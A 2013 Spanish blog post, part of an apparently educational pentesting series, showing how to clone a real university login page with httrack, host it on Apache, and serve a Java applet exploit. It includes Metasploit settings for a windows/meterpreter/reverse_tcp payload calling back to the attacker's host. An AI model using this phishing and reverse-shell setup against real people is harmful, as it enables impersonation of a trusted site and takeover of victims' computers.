13 feb 2013

Episodio de Pentesting (Parte VII)

Hola! hoy seguiremos con nuestra cadena Episodio de Pentesting hablando sobre Ingeniería Social :)

Durante el desarrollo del proyecto me estuve planteando la posibilidad de omitir este apartado. Sin embargo después de no pocas reflexiones, creo que a nivel de poner en práctica este episodio en el mundo real, esta es la parte más importante. Se debe hacer caer a la víctima en la trampa, y una de las maneras más eficientes es suplantando la identidad de un sitio web habitual de tal manera que el usuario no se dé cuenta de la trampa. Creo que estamos de acuerdo en que un index.html del tipo <h1>HOLA, SI ACEPTAS ESTE APPLET VOY A HACKEARTE EL PC</h1> no es demasiado útil.

Pero… ¿Y si clonamos la web de Google? Pensé en clonar la UJA, pero la verdad es que ocupa demasiado y tardaríamos en descargar el árbol de direcciones bastante rato. Al final, decidí inyectarlo en un sitio más creíble, ya que a día de hoy es improbable que Google inserte un applet de Java en su buscador y me decidí por inyectarlo justo en el enlace de autenticación de dv.ujaen.es, cambiando el link en el código fuente hacia mi IP.

Me pongo manos a la obra,  y aunque podría descargarme el código directamente con wget o con un right click en la misma web, o incluso copiando directamente el código fuente visible, eso es una chapuza a no ser que nos queramos pasar un par de horas redireccionando hojas de estilo y contenido multimedia.

Descargamos un programa que se encarga de hacer la tarea por nosotros, httrack.

“apt-get install httrack”

Nos situamos en la carpeta que queramos descargar la web, y ejecutamos el programa pasando como argumento la web que deseemos.

“httrack dv.ujaen.es”

(httrack clonando www.google.es)

Una vez copiada la web en la carpeta que hayamos definido por defecto (recomiendo que no sea directamente el servidor por si hay algún fallo) comprobamos que está bien en el navegador, y la copiamos directamente a la carpeta del servidor apache, ya sea únicamente el index o también archivos y carpetas asociados.

“cp dv.ujaen.es/* /var/www”

Una vez lo hemos copiado iniciamos el servidor apache desde el menú.

Applications -> Backtrack -> Services -> HTTPD -> apache start

Básicamente ya está todo copiado y listo para funcionar. Os adjunto como información adicional los parámetros exactos que yo he utilizado para configurar el exploit y el payload en MSF.

set APPLETNAME UJA_AUTH

set CERTCN Ujaen

set URIPATH /authapplet

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.1.XXX

(Hay que tener cuidado de no establecer como Puerto del servidor el 80, ya que lo estamos utilizando para alojar a la web clonada)

Eso es todo por hoy, saludos!

3 comentarios:

  1. Pero que se esta clonando la web ujaen.es o google.es

    ResponderEliminar
  2. Mia abuela decia las cosas claras y el chocolate espeso... la verdad es que te agradezco de veras tu trabajo, pero me resulta poco claro la afirmacion que haces al principio de: "Durante el desarrollo del proyecto me estuve planteando la posibilidad de omitir este apartado. Sin embargo después de no pocas reflexiones, creo que a nivel de poner en práctica este episodio en el mundo real, esta es la parte más importante" Y luego, me resulta espeso que te limites a decirnos que despues de clonar la web con el httrack, nos enseñas tu exploit y que? que hacemos? nos hemos quedado a medias? o lo explicas todo o no expliques nada y encima te justifiques, sin acritud, en cualquier caso, gracias

    ResponderEliminar
  3. Hola RedLion, no te preocupes, la semana que viene tendremos la continuación de la cadena que Nico se está currando :)un saludo

    ResponderEliminar